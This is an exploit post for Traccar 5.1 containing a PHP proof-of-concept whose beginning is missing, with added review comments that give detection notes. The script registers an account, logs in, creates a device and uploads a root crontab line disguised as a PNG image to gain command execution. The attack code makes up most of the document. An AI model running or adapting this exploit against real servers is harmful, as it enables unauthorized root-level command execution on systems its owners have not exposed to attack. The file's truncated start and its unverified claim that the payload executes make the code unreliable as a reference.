=============================================================================================================================================
| # Title : Traccar 5.1 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://www.traccar.org/old-versions/ |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.
[+] This PHP script assumes you're targeting a similar HTTP service that allows file uploads and interacting with REST APIs.
[+] save payload as poc.php
[+] usage : C:\www\test>php poc.php
[+] Line 117 : login info : 'root', 'toor', 'indoushka@packetstormsecurity.com', '/');
[+] payload :

// NOTE(review): the page shows no `<?php` tag, no class declaration, no property
// declarations and no constructor signature before this point, and the first
// assignment below has lost its `$this->` prefix. Everything from the opening
// `<?php` up to that first `$this->` appears to have been stripped in rendering
// (as an HTML tag would be). Treat this fragment as the tail of the constructor,
// not as a faithful copy of the original file.
host = $host;
$this->port = $port;
$this->username = $username;
$this->password = $password;
$this->email = $email;
$this->target_uri = $target_uri;
}

/**
 * Performs one HTTP request to http://{host}:{port}{uri} and decodes the body as JSON.
 *
 * Observable behaviour (all from the code below):
 *  - plain http:// is hard-coded; no TLS, no timeout, no certificate handling;
 *  - a fresh curl handle is created per call and only a Content-Type header is set,
 *    so nothing from an earlier response is carried forward;
 *  - curl errors are not inspected: when curl_exec() returns false, json_decode()
 *    receives an empty string and the caller simply sees null.
 *
 * @param string      $method HTTP method passed via CURLOPT_CUSTOMREQUEST.
 * @param string      $uri    Path appended verbatim to the host:port prefix.
 * @param string|array|null $data   Request body; skipped entirely when falsy.
 * @param string      $ctype  Value of the Content-Type header.
 * @return array|null Decoded JSON body as an associative array, or null when the
 *                    body is missing or is not valid JSON.
 */
public function send_request($method, $uri, $data = null, $ctype = 'application/json') {
    $url = "http://{$this->host}:{$this->port}{$uri}";
    $headers = [
        "Content-Type: {$ctype}",
    ];
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    if ($data) {
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    }
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    $response = curl_exec($ch);
    curl_close($ch);
    return json_decode($response, true);
}

/**
 * Step 1: unauthenticated POST to api/users creating an account with the
 * configured name, email and password (totpKey null).
 *
 * This only succeeds where the target accepts account self-registration, so
 * disabling open registration removes this step for a defender. Detection
 * angle: an account creation from an unfamiliar source that is followed within
 * seconds by a session creation and a device creation from the same client.
 *
 * NOTE(review): success is judged by `$res['code'] === 200`; the page shows no
 * sample response confirming that the endpoint returns a numeric `code` field.
 * Aborts the script (die) on any other outcome.
 */
public function register_user() {
    echo "Registering new user...\n";
    $body = json_encode([
        'name' => $this->username,
        'email' => $this->email,
        'password' => $this->password,
        'totpKey' => null
    ]);
    $res = $this->send_request('POST', $this->target_uri . 'api/users', $body);
    if (!$res || $res['code'] !== 200) {
        die("Failed to register user. Response: " . print_r($res, true));
    }
    echo "User registered successfully.\n";
}

/**
 * Step 2: POST api/session with email/password as a form-encoded body
 * (Content-Type application/x-www-form-urlencoded).
 *
 * Same `code === 200` success check as register_user(); aborts otherwise.
 * Nothing from this response is stored by the script (see send_request()).
 */
public function authenticate() {
    echo "Authenticating...\n";
    $data = http_build_query([
        'email' => $this->email,
        'password' => $this->password
    ]);
    $res = $this->send_request('POST', $this->target_uri . 'api/session', $data, 'application/x-www-form-urlencoded');
    if (!$res || $res['code'] !== 200) {
        die("Failed to authenticate. Response: " . print_r($res, true));
    }
    echo "Authenticated successfully.\n";
}

/**
 * Step 3: create a device with random hex name/uniqueId (16 hex chars each),
 * then upload a single system-crontab-style line (six fields, user column
 * `root`, runs every minute) to api/devices/{id}/image, declaring it as
 * image/png with a random 12-hex-char `.png` filename.
 *
 * Defender's view of what is observable here:
 *  - the declared MIME type and extension disagree with the body, which is
 *    plain text, so server-side validation of image uploads by content (magic
 *    bytes / image decoding) rather than by declared type or extension is the
 *    relevant mitigation, and an upload whose body is not a parseable image is
 *    the thing to alert on;
 *  - the upload response is never checked and "Waiting for execution..." is
 *    printed unconditionally: nothing in this script verifies execution, and
 *    the page does not show how a file stored by the device-image endpoint
 *    would ever be read by cron, so the execution claim is not substantiated
 *    by the visible code.
 *
 * NOTE(review): the file is handed to curl via a `data://` URI in
 * curl_file_create(); whether that wrapper is honoured depends on the PHP
 * build and is not verified on the page.
 *
 * @param string $cmd Command text interpolated into the cron line.
 */
public function upload_cron_file($cmd) {
    echo "Adding new device...\n";
    $body = json_encode([
        'name' => bin2hex(random_bytes(8)),
        'uniqueId' => bin2hex(random_bytes(8))
    ]);
    $res = $this->send_request('POST', $this->target_uri . 'api/devices', $body);
    if (!$res || $res['code'] !== 200) {
        die("Failed to add device. Response: " . print_r($res, true));
    }
    $device_id = $res['id'];
    $cron_job = "* * * * * root /bin/bash -c '{$cmd}'\n";
    $cron_filename = bin2hex(random_bytes(6));
    echo "Uploading crontab file...\n";
    $file_data = [
        'file' => curl_file_create("data://text/plain;base64," . base64_encode($cron_job), 'image/png', "{$cron_filename}.png")
    ];
    // Multipart upload; the return value is discarded, so a rejected upload is
    // indistinguishable from an accepted one at this point.
    $this->send_request('POST', $this->target_uri . "api/devices/{$device_id}/image", $file_data, 'multipart/form-data');
    echo "Cronjob file uploaded successfully. Waiting for execution...\n";
}

/**
 * Runs the three steps in order: register, authenticate, upload.
 * Each step die()s on its own failure check, so later steps never run after an
 * earlier one fails.
 *
 * @param string $cmd Forwarded to upload_cron_file().
 */
public function exploit($cmd) {
    $this->register_user();
    $this->authenticate();
    $this->upload_cron_file($cmd);
}
}

// Usage example: targets localhost on port 8082 with the credentials listed in
// the header above and a target_uri of '/'.
$exploit = new TraccarExploit('127.0.0.1', 8082, 'root', 'toor', 'indoushka@packetstormsecurity.com', '/');
$exploit->exploit('id'); // Replace 'id' with your desired command to execute
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================